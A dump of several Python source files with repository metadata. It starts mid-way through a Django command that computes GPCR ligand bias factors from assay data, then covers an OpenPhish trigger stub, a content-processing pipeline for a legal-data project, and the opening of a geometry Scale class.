temp_dict['quantitive_measure_type'] = j['children'][0].quantitive_measure_type
temp_dict['efficacy_measure_type'] = j['children'][0].efficacy_measure_type
temp_dict['transduction_coef'] = j['children'][0].transduction_coef
temp_dict['relative_transduction_coef'] = j['children'][0].relative_transduction_coef
temp_dict['bias_reference'] = j['children'][0].bias_reference
temp_dict['emax_reference_ligand'] = j['children'][0].emax_ligand_reference
temp_dict['ligand_function'] = j['children'][0].ligand_function
temp_dict['ligand'] = j['main'].ligand
temp_dict['quantitive_activity'], temp_dict['quantitive_activity_initial'] = Command.process_ec50_children_from_queryset(
temp_dict)
return temp_dict
@staticmethod
def process_ec50_children_from_queryset(temp_dict):
try:
temp_dict['quantitive_activity'] = float(
temp_dict['quantitive_activity'])
except:
temp_dict['quantitive_activity'] = temp_dict['quantitive_activity']
if (temp_dict['quantitive_activity_initial'] and
temp_dict['quantitive_measure_type'] != "Effect at single point measurement"):
temp_dict['quantitive_activity_initial'] = (-1) * math.log10(
temp_dict['quantitive_activity_initial'])
temp_dict['quantitive_activity_initial'] = "{:.2F}".format(
Decimal(temp_dict['quantitive_activity_initial']))
return temp_dict['quantitive_activity'], temp_dict['quantitive_activity_initial']
@staticmethod
def combine_unique(data):
'''
combining tested assays and reference assays
'''
_counter_of_assays = 0
context = dict()
for j in data:
name = str(j['publication'].id) + \
'/' + str(j['receptor'].id)
temp_obj = list()
if name in context:
temp_obj = context[name]['assay']
for i in j['assay']:
temp_obj.append(i)
context[name] = j
context[name]['assay'] = temp_obj
_counter_of_assays = _counter_of_assays + \
len(context[name]['assay'])
print("******len of experiments:", len(context), "******")
print("******len of assays:", _counter_of_assays, "******")
return context
@staticmethod
def process_referenced_assays(data):
'''
separate tested assays and reference assays
'''
for j in data.items():
assays, reference = Command.return_refenced_assays(j[1]['assay'])
j[1]['assay_list'] = assays
j[1]['reference_assays_list'] = reference
j[1].pop('assay')
return data
_reference_assay_counter = 0
_tested_assay_counter = 0
@staticmethod
def check_endogenous_assay_numbers(number):
if number is not None:
return True
else:
return False
@staticmethod
def return_refenced_assays(assays):
main, reference = list(), list()
for assay in assays:
# TODO: change to primary_Endogenous
if (assay['bias_reference'] == 'Ref. and principal endo.' or
assay['bias_reference'] == 'Endogenous' or
assay['bias_reference'] == 'Principal endogenous' or
assay['bias_reference'] == 'Ref. and endo.'):
_ec50 = Command.check_endogenous_assay_numbers(assay['quantitive_activity'])
_tau = Command.check_endogenous_assay_numbers(assay['transduction_coef'])
_delta_tau = Command.check_endogenous_assay_numbers(assay['relative_transduction_coef'])
if any([_ec50,_tau,_delta_tau]):
# if assay['quantitive_activity'] is not None:
reference.append(assay)
Command._reference_assay_counter = Command._reference_assay_counter + 1
else:
main.append(assay)
Command._tested_assay_counter = Command._tested_assay_counter + 1
main = Command.fetch_endogenous_assay(main, reference)
return main, reference
@staticmethod
def fetch_endogenous_assay(main, references):
result_list = list()
for assay in main:
temp_reference_list = list()
for reference in references:
if assay['family'] == reference['family']:
if assay['signalling_protein'] == reference['signalling_protein']:
if assay['assay_type'] == reference['assay_type']:
if assay['cell_line'] == reference['cell_line']:
if assay['measured_biological_process'] == reference['measured_biological_process']:
temp_reference_list.append(reference)
if len(temp_reference_list)>0:
if len(temp_reference_list)>1:
final_end = None
for _reference_assay in temp_reference_list:
if _reference_assay['bias_reference'] == "Principal endogenous" or _reference_assay['bias_reference'] == "Ref. and principal endo.":
assay['endogenous_assay'] = _reference_assay
final_end = _reference_assay
break
else:
assay['endogenous_assay'] = _reference_assay
final_end = _reference_assay
for _reference_assay in temp_reference_list:
if _reference_assay['bias_reference'] != "Principal endogenous" and _reference_assay['bias_reference'] != "Ref. and principal endo.":
_reference_assay['endogenous_assay'] = final_end
result_list.append(_reference_assay)
else:
assay['endogenous_assay'] = temp_reference_list[0]
for assay in main:
if len(assay['endogenous_assay']) > 0:
assay['calculated_relative_tau'] = Command.calculate_relative_transduction_coef(assay)
result_list.append(assay)
return result_list
@staticmethod
def separate_ligands(context, command):
content = dict()
for i in context.items():
for assay in i[1]['assay_list']:
_pub_name = str(i[1]['publication'].id)
_ligand_name = str(assay['ligand'].id)
_receptor_name = str(i[1]['receptor'].id)
_receptor_iso_name = str(i[1]['receptor_isoform'])
_aux_prot_name = str(i[1]['auxiliary_protein'])
_tissue = assay['_tissue']
_species = assay['_species']
_pathway = assay['pathway_level']
if command == 'inferred':
name = _pub_name+'/'+_ligand_name+'/'+_receptor_name+'/'+_receptor_iso_name+'/'+_aux_prot_name+'/'+_tissue+'/'+_species
# may be add cell line tissue and species and assay type
elif command == 'subtypes':
name = _pub_name+'/'+_ligand_name+'/'+_receptor_name+'/'+_receptor_iso_name+'/'+_aux_prot_name+'/'+str(assay['family'])+'/'+_tissue+'/'+_species
# may be add cell line tissue and species and assay type
if name in content:
content[name]['assay_list'].append(assay)
else:
content[name] = dict()
content[name]['assay_list'] = list()
content[name]['publication'] = i[1]['publication']
content[name]['ligand'] = assay['ligand']
content[name]['receptor_isoform']=i[1]['receptor_isoform']
content[name]['receptor_gtpo']=i[1]['receptor_gtpo']
content[name]['ligand_links'] = Command.get_external_ligand_ids(
content[name]['ligand'])
try:
content[name]['reference_ligand'] = i[1]['reference_assays_list'][0]['ligand']
except:
content[name]['reference_ligand'] = None
content[name]['auxiliary_protein'] = i[1]['auxiliary_protein']
# TODO: add external LigandStatistics
content[name]['endogenous_ligand'] = i[1]['endogenous_ligand']
content[name]['receptor'] = i[1]['receptor']
content[name]['vendor_counter'] = i[1]['vendor_counter']
content[name]['authors'] = i[1]['authors']
content[name]['article_quantity'] = i[1]['article_quantity']
content[name]['labs_quantity'] = i[1]['labs_quantity']
content[name]['assay_list'].append(assay)
content[name]['ligand_source_id'] = assay['ligand_source_id']
content[name]['ligand_source_type'] = assay['ligand_source_type']
return content
@staticmethod
def get_external_ligand_ids(ligand):
ligand_list = list()
try:
for i in ligand.properities.web_links.all():
ligand_list.append(
{'name': i.web_resource.name, "link": i.index})
except:
ligand_list = list()
return ligand_list
@staticmethod
def process_signalling_proteins(context, command):
for i in context.items():
i[1]['assay_list'] = Command.calculate_bias_factor_value(
i[1]['assay_list'])
i[1]['assay_list'] = Command.sort_assay_list(i[1]['assay_list'])
i[1]['backup_assays'] = i[1]['assay_list']
i[1]['assay_list'] = Command.limit_family_set(i[1]['assay_list'], command)
# TODO: order by transduction_coef
i[1]['assay_list'] = Command.order_assays(i[1]['assay_list'])
return context
@staticmethod
def order_assays(assays):
try:
sorted_assay = sorted(assays, key=lambda k: k['calculated_relative_tau'], reverse=True)
except:
try:
sorted_assay = sorted(assays, key=lambda k: k['relative_transduction_coef'], reverse=True)
except:
sorted_assay = sorted(assays, key=lambda k: k['delta_emax_ec50']
if k['delta_emax_ec50'] else float(-1000), reverse=True)
for item in enumerate(sorted_assay):
item[1]['order_no'] = item[0]
return assays
@staticmethod
def limit_family_set(assay_list, command):
families = list()
proteins = set()
if command == 'inferred':
option = 'family'
else:
option = 'signalling_protein'
for assay in assay_list:
if assay[option] not in proteins:
proteins.add(assay[option])
families.append(assay)
else:
try:
compare_val = next(
item for item in families if item[option] == assay[option])
except StopIteration:
pass
if assay['calculated_relative_tau']:
try:
if assay['calculated_relative_tau'] > compare_val['calculated_relative_tau']:
families[:] = [d for d in families if d.get(
option) != compare_val[option]]
except:
families[:] = [d for d in families if d.get(
option) != compare_val[option]]
elif assay['relative_transduction_coef']:
try:
if assay['relative_transduction_coef'] > compare_val['relative_transduction_coef']:
families[:] = [d for d in families if d.get(
option) != compare_val[option]]
except:
families[:] = [d for d in families if d.get(
option) != compare_val[option]]
elif assay['transduction_coef']:
try:
if assay['transduction_coef'] > compare_val['transduction_coef']:
families[:] = [d for d in families if d.get(
option) != compare_val[option]]
except:
families[:] = [d for d in families if d.get(
option) != compare_val[option]]
else:
if (assay['delta_emax_ec50'] is not None and compare_val['delta_emax_ec50'] is not None):
if assay['delta_emax_ec50'] > compare_val['delta_emax_ec50']:
families[:] = [d for d in families if d.get(
option) != compare_val[option]]
families.append(assay)
return families
@staticmethod
def sort_assay_list(i):
return_assay = dict()
return_assay = sorted(i, key=lambda k: k['delta_emax_ec50']
if k['delta_emax_ec50'] else float(-1000), reverse=True)
return return_assay
@staticmethod
def calculate_bias_factor_value(sorted_assays):
# TODO: pick
for assay in sorted_assays:
if assay['delta_emax_ec50']:
temp_value = Command.calc_order_bias_value(
assay, assay['endogenous_assay'])
try:
if assay['delta_emax_ec50'] < temp_value:
assay['delta_emax_ec50'] = temp_value
except:
pass
else:
assay['delta_emax_ec50'] = Command.calc_order_bias_value(
assay, assay['endogenous_assay'])
return sorted_assays
@staticmethod
def calc_order_bias_value(assay,reference):
result = None
try:
assay_a = assay['quantitive_activity']
assay_b = assay['quantitive_efficacy']
reference_a = reference['quantitive_activity']
reference_b = reference['quantitive_efficacy']
result = math.log10((assay_b / assay_a)) - \
math.log10((reference_b / reference_a))
except:
try:
if assay['quantitive_activity_initial']:
assay_a = float(assay['quantitive_activity_initial'])
assay_a = 10**(assay_a*(-1))
assay_b = assay['quantitive_efficacy']
reference_a = reference['quantitive_activity']
reference_b = reference['quantitive_efficacy']
result = math.log10((assay_b / assay_a)) - \
math.log10((reference_b / reference_a))
except:
# import pdb; pdb.set_trace()
result = None
return result
@staticmethod
def process_calculation(context):
list_to_remove = list()
for i in context.items():
if len(i[1]['assay_list'])>1:
for assay in i[1]['assay_list']:
if assay['order_no'] == 0 and assay['delta_emax_ec50'] is None:
list_to_remove.append(i[0])
i[1]['biasdata'] = i[1]['assay_list']
i[1].pop('assay_list')
# calculate log bias
Command.calc_bias_factor(i[1]['biasdata'])
# Command.calc_potency_and_transduction(i[1]['biasdata'])
else:
list_to_remove.append(i[0])
for experiment in list_to_remove:
context.pop(experiment)
return context
@staticmethod
def calc_bias_factor(biasdata):
most_potent = dict()
for i in biasdata:
if i['order_no'] == 0:
most_potent = i
for i in biasdata:
if i['order_no'] != 0:
try:
i['potency'] = round(
i['quantitive_activity'] / most_potent['quantitive_activity'], 1)
except:
i['potency'] = None
i['relative_transduction_coef'], i['delta_relative_transduction_coef'] = Command.calcualte_trunsduction(most_potent, i)
i['log_bias_factor'] = Command.lbf_process_qualitative_data(i)
if i['log_bias_factor'] == None:
# import pdb; pdb.set_trace()
i['log_bias_factor'] = Command.lbf_process_efficacy(i)
if i['log_bias_factor'] == None:
# import pdb; pdb.set_trace()
i['log_bias_factor'] = Command.lbf_calculate_bias(
i,most_potent)
if i['log_bias_factor'] == None:
i['log_bias_factor'] = Command.lbf_process_ic50(i)
@staticmethod
def calcualte_trunsduction(most_potent, i):
result = None
pre_result = None
if most_potent['calculated_relative_tau'] is not None:
if i['transduction_coef']:
try:
pre_result = Command.calculate_relative_transduction_coef(i)
result = most_potent['calculated_relative_tau'] - pre_result
# print('***calculated***', result)
except:
pre_result = None
result = None
elif i['transduction_coef'] is None and i['relative_transduction_coef']:
try:
if i['endogenous_assay']['relative_transduction_coef'] and i['endogenous_assay']['relative_transduction_coef'] == 0:
if most_potent['relative_transduction_coef'] is not None:
try:
pre_result = i['relative_transduction_coef']
result = most_potent['relative_transduction_coef'] - i['relative_transduction_coef']
except Exception:
pre_result = None
result = None
except:
pre_result = None
result = None
elif most_potent['relative_transduction_coef'] is not None:
try:
if most_potent['endogenous_assay']['relative_transduction_coef'] and most_potent['endogenous_assay']['relative_transduction_coef'] == 0:
try:
pre_result = i['relative_transduction_coef']
result = most_potent['relative_transduction_coef'] - i['relative_transduction_coef']
except Exception:
pre_result = None
result = None
except:
pre_result = None
result = None
return pre_result, result
@staticmethod
def calculate_relative_transduction_coef(i):
relative_transduction_coef = None
try:
if i['transduction_coef'] is not None:
relative_transduction_coef = i['transduction_coef'] - i['endogenous_assay']['transduction_coef']
except Exception:
relative_transduction_coef = None
return relative_transduction_coef
@staticmethod
def lbf_process_qualitative_data(i):
return_message = None
try:
if i['qualitative_activity'] == 'No activity':
return_message = "Full Bias"
elif i['qualitative_activity'] == 'Low activity':
return_message = "High Bias"
elif i['qualitative_activity'] == 'High activity':
return_message = "Low Bias"
elif i['qualitative_activity'] == 'Inverse agonism/antagonism':
return_message = "Full Bias"
except:
return_message = None
return return_message
@staticmethod
def lbf_process_efficacy(i):
return_message = None
try:
if i['quantitive_efficacy'] == 0:
return_message = "Full Bias"
except:
return_message = None
return return_message
@staticmethod
def lbf_calculate_bias(i, most_potent):
return_message = None
try:
temp_calculation = most_potent['delta_emax_ec50'] - i['delta_emax_ec50']
return_message = round(temp_calculation, 1)
except:
return_message = None
return return_message
@staticmethod
def lbf_process_ic50(i):
return_message = None
try:
if (i['quantitive_measure_type'].lower() == 'ic50' and
i['endogenous_assay']['quantitive_measure_type'].lower() == 'ic50'):
return_message = 'Only agonist in main pathway'
except:
return_message = None
return return_message
@staticmethod
def count_publications(context):
temp = dict()
for i in context.items():
labs = list()
i[1]['labs'] = 0
labs.append(i[1]['publication'])
lab_counter = 1
for j in context.items():
if j[1]['publication'] not in labs:
if set(i[1]['authors']) & set(j[1]['authors']):
lab_counter += 1
labs.append(j[1]['publication'])
i[1]['labs'] = lab_counter
temp_obj = 1
name = str(i[1]['endogenous_ligand']) + \
'/' + str(i[1]['ligand'])+'/'+str(i[1]['receptor'])
if name in temp:
for assays in i[1]['biasdata']:
if assays['order_no'] > 0:
if assays['log_bias_factor'] != None and assays['log_bias_factor'] != '' or assays['delta_relative_transduction_coef'] != None and assays['delta_relative_transduction_coef'] != '':
temp_obj = temp[name] + 1
temp[name] = temp_obj
for i in context.items():
temp_obj = 0
name = str(i[1]['endogenous_ligand']) + \
'/' + str(i[1]['ligand'])+'/'+str(i[1]['receptor'])
if name in temp:
i[1]['article_quantity'] = temp[name]
@staticmethod
def save_data_to_model(context, source):
for i in context['data'].items():
if len(i[1]['biasdata']) > 1:
experiment_entry = AnalyzedExperiment(publication=i[1]['publication'],
ligand=i[1]['ligand'],
external_ligand_ids=i[1]['ligand_links'],
receptor=i[1]['receptor'],
source=source,
receptor_isoform=i[1]['receptor_isoform'],
receptor_gtpo=i[1]['receptor_gtpo'],
endogenous_ligand=i[1]['endogenous_ligand'],
vendor_quantity=i[1]['vendor_counter'],
reference_ligand=i[1]['reference_ligand'],
article_quantity=i[1]['article_quantity'],
labs_quantity=i[1]['labs'],
ligand_source_id=i[1]['ligand_source_id'],
ligand_source_type=i[1]['ligand_source_type']
)
experiment_entry.save()
for ex in i[1]['biasdata']:
# try:
if ex['endogenous_assay'] is not None:
try:
ex['log_bias_factor'] = round(
ex['log_bias_factor'], 1)
except:
ex['log_bias_factor'] = ex['log_bias_factor']
try:
ex['delta_emax_ec50'] = round(ex['delta_emax_ec50'], 1)
except:
ex['delta_emax_ec50'] = ex['delta_emax_ec50']
try:
if ex['calculated_relative_tau'] is not None:
ex['relative_transduction_coef'] = ex['calculated_relative_tau']
ex['transduction_coef'] = round(ex['transduction_coef'], 1)
ex['relative_transduction_coef'] = round(ex['relative_transduction_coef'], 1)
ex['delta_relative_transduction_coef'] = round(ex['delta_relative_transduction_coef'],1)
except:
ex['transduction_coef'] = ex['transduction_coef']
ex['relative_transduction_coef'] = ex['relative_transduction_coef']
ex['delta_relative_transduction_coef'] = ex['delta_relative_transduction_coef']
try:
ex['quantitive_activity'] = round(
ex['quantitive_activity'], 1)
except:
ex['quantitive_activity'] = ex['quantitive_activity']
try:
ex['quantitive_efficacy'] = int(
ex['quantitive_efficacy'])
except:
ex['quantitive_efficacy'] = ex['quantitive_efficacy']
emax_ligand = ex['emax_reference_ligand']
try:
endogenous_assay_used = ex['endogenous_assay']['assay_initial']
except:
import pdb; pdb.set_trace()
assay_description = 'tested_assays'
if source == 'sub_different_family':
assay_description = 'sub_tested_assays'
experiment_assay = AnalyzedAssay(experiment=experiment_entry,
assay_description=assay_description,
family=ex['family'],
order_no=ex['order_no'],
signalling_protein=ex['signalling_protein'],
cell_line=ex['cell_line'],
assay_type=ex['assay_type'],
pathway_level=ex['pathway_level'],
reference_assay_initial = endogenous_assay_used,
molecule_1=ex['molecule_1'],
molecule_2=ex['molecule_2'],
assay_time_resolved=ex['assay_time_resolved'],
ligand_function=ex['ligand_function'],
quantitive_measure_type=ex['quantitive_measure_type'],
quantitive_activity=ex['quantitive_activity'],
quantitive_activity_initial=ex['quantitive_activity_initial'],
quantitive_unit=ex['quantitive_unit'],
qualitative_activity=ex['qualitative_activity'],
quantitive_efficacy=ex['quantitive_efficacy'],
efficacy_measure_type=ex['efficacy_measure_type'],
efficacy_unit=ex['efficacy_unit'],
potency=ex['potency'],
relative_transduction_coef=ex['relative_transduction_coef'],
transduction_coef=ex['transduction_coef'],
delta_relative_transduction_coef=ex['delta_relative_transduction_coef'],
log_bias_factor=ex['log_bias_factor'],
delta_emax_ec50=ex['delta_emax_ec50'],
effector_family=ex['family'],
measured_biological_process=ex['measured_biological_process'],
signal_detection_tecnique=ex['signal_detection_tecnique'],
emax_ligand_reference=emax_ligand
)
experiment_assay.save()
for ex in i[1]['backup_assays']:
assay_description = 'backup_assays'
if source == 'sub_different_family':
assay_description = 'sub_backup_assays'
experiment_assay = AnalyzedAssay(experiment=experiment_entry,
reference_assay_initial = None,
family=ex['family'],
order_no=ex['order_no'],
signalling_protein=ex['signalling_protein'],
cell_line=ex['cell_line'],
assay_type=ex['assay_type'],
assay_description=assay_description,
molecule_1=ex['molecule_1'],
molecule_2=ex['molecule_2'],
assay_time_resolved=ex['assay_time_resolved'],
ligand_function=ex['ligand_function'],
quantitive_measure_type=ex['quantitive_measure_type'],
quantitive_activity=ex['quantitive_activity'],
quantitive_activity_initial=ex['quantitive_activity_initial'],
quantitive_unit=ex['quantitive_unit'],
qualitative_activity=ex['qualitative_activity'],
quantitive_efficacy=ex['quantitive_efficacy'],
efficacy_measure_type=ex['efficacy_measure_type'],
efficacy_unit=ex['efficacy_unit'],
potency=ex['potency'],
relative_transduction_coef=ex['relative_transduction_coef'],
transduction_coef=ex['transduction_coef'],
log_bias_factor=ex['log_bias_factor'],
delta_emax_ec50=ex['delta_emax_ec50'],
effector_family=ex['family'],
measured_biological_process=ex['measured_biological_process'],
signal_detection_tecnique=ex['signal_detection_tecnique'],
emax_ligand_reference=ex['ligand']
)
experiment_assay.save()
| 50.110102
| 204
| 0.52665
|
8f1dd4b3fcea8841f1725ebadb2d6e995c47c438
| 74
|
py
|
Python
|
plugins/openphish/komand_openphish/triggers/save_feed_file/__init__.py
|
lukaszlaszuk/insightconnect-plugins
|
8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892
|
[
"MIT"
] | 46
|
2019-06-05T20:47:58.000Z
|
2022-03-29T10:18:01.000Z
|
plugins/openphish/komand_openphish/triggers/save_feed_file/__init__.py
|
lukaszlaszuk/insightconnect-plugins
|
8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892
|
[
"MIT"
] | 386
|
2019-06-07T20:20:39.000Z
|
2022-03-30T17:35:01.000Z
|
plugins/openphish/komand_openphish/triggers/save_feed_file/__init__.py
|
lukaszlaszuk/insightconnect-plugins
|
8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892
|
[
"MIT"
] | 43
|
2019-07-09T14:13:58.000Z
|
2022-03-28T12:04:46.000Z
|
# GENERATED BY KOMAND SDK - DO NOT EDIT
from .trigger import SaveFeedFile
| 24.666667
| 39
| 0.783784
|
b9aff89920212d9537e9d1d11ae5861e1fbec7b7
| 12,926
|
py
|
Python
|
oldp/apps/processing/content_processor.py
|
docsuleman/oldp
|
8dcaa8e6e435794c872346b5014945ace885adb4
|
[
"MIT"
] | 66
|
2018-05-07T12:34:39.000Z
|
2022-02-23T20:14:24.000Z
|
oldp/apps/processing/content_processor.py
|
Justice-PLP-DHV/oldp
|
eadf235bb0925453d9a5b81963a0ce53afeb17fd
|
[
"MIT"
] | 68
|
2018-06-11T16:13:17.000Z
|
2022-02-10T08:03:26.000Z
|
oldp/apps/processing/content_processor.py
|
Justice-PLP-DHV/oldp
|
eadf235bb0925453d9a5b81963a0ce53afeb17fd
|
[
"MIT"
] | 15
|
2018-06-23T19:41:13.000Z
|
2021-08-18T08:21:49.000Z
|
import glob
import logging.config
import os
from enum import Enum
from importlib import import_module
from typing import List
from urllib.parse import parse_qsl
from django.conf import settings
from django.db.models import Model
from oldp.apps.processing.errors import ProcessingError
from oldp.apps.processing.processing_steps import BaseProcessingStep
ContentStorage = Enum('ContentStorage', 'ES FS DB')
logger = logging.getLogger(__name__)
class InputHandler(object):
input_selector = None # Can be single, list, ... depends on get_content
input_limit = 0 # 0 = unlimited
input_start = 0
skip_pre_processing = False
pre_processed_content = []
def __init__(self, limit=0, start=0, selector=None, *args, **kwargs):
self.input_limit = limit
self.input_selector = selector
self.input_start = start
def handle_input(self, input_content) -> None:
raise NotImplementedError()
def get_input(self) -> list:
raise NotImplementedError()
class InputHandlerDB(InputHandler):
"""Read objects for re-processing from db"""
skip_pre_processing = True
per_page = 1000
def __init__(self, order_by: str='updated_date', filter_qs=None, exclude_qs=None, *args, **kwargs):
super().__init__(*args, **kwargs)
# TODO Validate order_by (must exist as model field)
self.order_by = order_by
self.filter_qs = filter_qs
self.exclude_qs = exclude_qs
if 'per_page' in kwargs and kwargs['per_page'] is not None and kwargs['per_page'] > 0:
self.per_page = kwargs['per_page']
@staticmethod
def set_parser_arguments(parser):
parser.add_argument('--order-by', type=str, default='updated_date',
help='Order items when reading from DB')
parser.add_argument('--filter', type=str,
help='Filter items with Django query language when reading from DB')
parser.add_argument('--exclude', type=str,
help='Exclude items with Django query language when reading from DB')
parser.add_argument('--per-page', type=int,
help='Number of items per page used for pagination')
def get_model(self):
raise NotImplementedError()
@staticmethod
def parse_qs_args(kwargs):
# Filter is provided as form-encoded data
kwargs_dict = dict(parse_qsl(kwargs))
for key in kwargs_dict:
val = kwargs_dict[key]
# Convert special values
if val == 'True':
val = True
elif val == 'False':
val = False
elif val.isdigit():
val = float(val)
kwargs_dict[key] = val
return kwargs_dict
def get_queryset(self):
return self.get_model().objects.all()
def get_input(self):
res = self.get_queryset().order_by(self.order_by)
# Filter
if self.filter_qs is not None:
# Filter is provided as form-encoded data
res = res.filter(**self.parse_qs_args(self.filter_qs))
if self.exclude_qs is not None:
# Exclude is provided as form-encoded data
res = res.filter(**self.parse_qs_args(self.exclude_qs))
# Set offset
res = res[self.input_start:]
# Set limit
if self.input_limit > 0:
return res[:self.input_limit]
return res
def handle_input(self, input_content):
self.pre_processed_content.append(input_content)
class InputHandlerFS(InputHandler):
"""Read content files for initial processing from file system"""
dir_selector = '/*'
def get_input_content_from_selector(self, selector) -> list:
content = []
if isinstance(selector, str):
if os.path.isdir(selector):
# Get all files recursive
content.extend(sorted(file for file in glob.glob(selector + self.dir_selector, recursive=True)))
elif os.path.isfile(selector):
# Selector is specific file
content.append(selector)
elif isinstance(selector, list):
# List of selectors
for s in selector:
content.extend(self.get_input_content_from_selector(s))
return content
def get_input(self) -> List[str]:
"""Select files from input_selector recursively and from directory with dir_selector """
if self.input_selector is None:
raise ProcessingError('input_selector is not set')
content_list = self.get_input_content_from_selector(self.input_selector)[self.input_start:]
if len(content_list) < 1:
raise ProcessingError('Input selector is empty: %s' % self.input_selector)
if self.input_limit > 0:
content_list = content_list[:self.input_limit]
return content_list
def handle_input(self, input_content: str) -> None:
raise NotImplementedError()
class ContentProcessor(object):
"""Base class for content processing pipeline
Methods are called in the following order:
1. get_input: returns list of input objects (fs: file path, db: model instance)
- fs: set_input: list of dirs or files
- db: set_input: db.queryset
2. handle_input: handles input objects and transforms them to processing objects (fs: file path > model instance
+ save instance, db: keep model instance); write to self.pre_processed_content
3. process: iterate over all processing steps (model instance > model instance), save processed model (in db
+ self.processed_content)
4. post_process: iterate over all post processing steps (e.g. write to ES)
"""
model = None # type: Model
working_dir = os.path.join(settings.BASE_DIR, 'workingdir')
input_handler = None # type: InputHandler
processed_content = []
pre_processed_content = []
available_processing_steps = None # type: dict
processing_steps = []
post_processing_steps = []
# Errors
pre_processing_errors = []
post_processing_errors = []
processing_errors = []
# Storage
# output_path = 'http://localhost:9200'
# DB settings (Django db models to be deleted on setup)
# db_models = []
# Stats
file_counter = 0
file_failed_counter = 0
doc_counter = 0
doc_failed_counter = 0
def __init__(self):
# Working dir
self.processing_steps = [] # type: List[BaseProcessingStep]
self.processed_content = []
self.pre_processed_content = []
self.pre_processing_errors = []
self.post_processing_errors = []
self.processing_errors = []
def set_parser_arguments(self, parser):
# Enable arguments that are used by all children
parser.add_argument('--verbose', action='store_true', default=False, help='Show debug messages')
parser.add_argument('step', nargs='*', type=str, help='Processing steps (use: "all" for all available steps)', default='all',
choices=list(self.get_available_processing_steps().keys()) + ['all'])
parser.add_argument('--limit', type=int, default=20,
help='Limits the number of items to be processed (0=unlimited)')
parser.add_argument('--start', type=int, default=0,
help='Skip the number of items before processing')
def set_options(self, options):
# Set options according to parser options
# self.output_path = options['output']
if options['verbose']:
logger.setLevel(logging.DEBUG)
def empty_content(self):
raise NotImplementedError()
def set_input_handler(self, handler: InputHandler):
self.input_handler = handler
def call_processing_steps(self, content):
"""Call each processing step one by one"""
for step in self.processing_steps: # type: BaseProcessingStep
try:
content = step.process(content)
except ProcessingError as e:
logger.error('Failed to call processing step (%s): %s' % (step, e))
self.processing_errors.append(e)
return content
def set_processing_steps(self, step_list):
"""Selects processing steps from available dict"""
# Unset old steps and load available steps
self.processing_steps = []
self.get_available_processing_steps()
if not isinstance(step_list, List):
step_list = [step_list]
if 'all' in step_list:
return self.available_processing_steps.values()
for step in step_list:
if step in self.available_processing_steps:
self.processing_steps.append(self.available_processing_steps[step])
else:
raise ProcessingError('Requested step is not available: %s' % step)
def get_available_processing_steps(self) -> dict:
"""Loads available processing steps based on package names in settings"""
if self.available_processing_steps is None:
self.available_processing_steps = {}
# Get packages for model type
if self.model.__name__ in settings.PROCESSING_STEPS:
for step_package in settings.PROCESSING_STEPS[self.model.__name__]: # type: str
module = import_module(step_package)
if 'ProcessingStep' not in module.__dict__:
raise ProcessingError('Processing step package does not contain "ProcessingStep" class: %s' % step_package)
step_cls = module.ProcessingStep() # type: BaseProcessingStep
if not isinstance(step_cls, BaseProcessingStep):
raise ProcessingError('Processing step needs to inherit from BaseProcessingStep: %s' % step_package)
step_name = step_package.split('.')[-1] # last module name from package path
# Write to dict
self.available_processing_steps[step_name] = step_cls
else:
raise ValueError('Model `%s` is missing settings.PROCESSING_STEPS.' % self.model.__name__)
return self.available_processing_steps
def process(self):
# Reset queues
self.pre_processed_content = []
self.processed_content = []
if self.input_handler.skip_pre_processing:
# Send input directly to content queue
self.pre_processed_content = self.input_handler.get_input()
else:
# Separate input handling and processing (processing needs to access previous items)
self.input_handler.pre_processed_content = []
for input_content in self.input_handler.get_input():
try:
self.input_handler.handle_input(input_content)
except ProcessingError as e:
logger.error('Failed to process content (%s): %s' % (input_content, e))
self.pre_processing_errors.append(e)
self.pre_processed_content = self.input_handler.pre_processed_content
logger.debug('Pre-processed content: %i' % len(self.pre_processed_content))
# Start actual processing
self.process_content()
# Call post processing steps (each with whole content queue)
for step in self.post_processing_steps:
try:
step.process(self.processed_content)
except ProcessingError as e:
logger.error('Failed to call post processing step (%s): %s' % (step, e))
self.post_processing_errors.append(e)
def process_content(self):
raise NotImplementedError("Child class instead to implement this method.")
def log_stats(self):
logger.info('Processing stats:')
logger.info('- Successful files: %i (failed: %i)' % (self.file_counter, self.file_failed_counter))
logger.info('- Successful documents: %i (failed: %i)' % (self.doc_counter, self.doc_failed_counter))
for step in self.post_processing_steps:
if hasattr(step, 'log_stats'):
step.log_stats()
if len(self.pre_processing_errors) > 0:
logger.warning('Pre-processing errors: %i' % len(self.pre_processing_errors))
logger.debug('Pre-processing errors: %s' % self.pre_processing_errors)
if len(self.processing_errors) > 0:
logger.warning('Processing errors: %i' % len(self.processing_errors))
logger.debug('Processing errors: %s' % self.processing_errors)
if len(self.post_processing_errors) > 0:
logger.warning('Post-processing errors: %i' % len(self.post_processing_errors))
logger.debug('Post-processing errors: %s' % self.post_processing_errors)
| 37.25072
| 133
| 0.637397
|
6634df436895202bf7adc234f984525b4a52f919
| 3,427
|
py
|
Python
|
src/compas/geometry/transformations/scale.py
|
funkchaser/compas
|
b58de8771484aa0c6068d43df78b1679503215de
|
[
"MIT"
] | 235
|
2017-11-07T07:33:22.000Z
|
2022-03-25T16:20:00.000Z
|
src/compas/geometry/transformations/scale.py
|
funkchaser/compas
|
b58de8771484aa0c6068d43df78b1679503215de
|
[
"MIT"
] | 770
|
2017-09-22T13:42:06.000Z
|
2022-03-31T21:26:45.000Z
|
src/compas/geometry/transformations/scale.py
|
funkchaser/compas
|
b58de8771484aa0c6068d43df78b1679503215de
|
[
"MIT"
] | 99
|
2017-11-06T23:15:28.000Z
|
2022-03-25T16:05:36.000Z
|
"""
This library for transformations partly derived and was re-implemented from the
following online resources:
* http://www.lfd.uci.edu/~gohlke/code/transformations.py.html
* http://www.euclideanspace.com/maths/geometry/rotations/
* http://code.activestate.com/recipes/578108-determinant-of-matrix-of-any-order/
* http://blog.acipo.com/matrix-inversion-in-javascript/
Many thanks to Christoph Gohlke, Martin John Baker, Sachin Joglekar and Andrew
Ippoliti for providing code and documentation.
"""
from compas.utilities import flatten
from compas.geometry import allclose
from compas.geometry import multiply_matrices
from compas.geometry.transformations import decompose_matrix
from compas.geometry.transformations import matrix_from_scale_factors
from compas.geometry.transformations import matrix_from_frame
from compas.geometry.transformations import matrix_inverse
from compas.geometry.transformations import Transformation
class Scale(Transformation):
"""Creates a scale transformation.
Parameters
----------
matrix : 4x4 matrix-like, optional
A 4x4 matrix (or similar) representing a scaling.
Raises
------
ValueError
If the default constructor is used,
and the provided transformation matrix is not a scale matrix.
Examples
--------
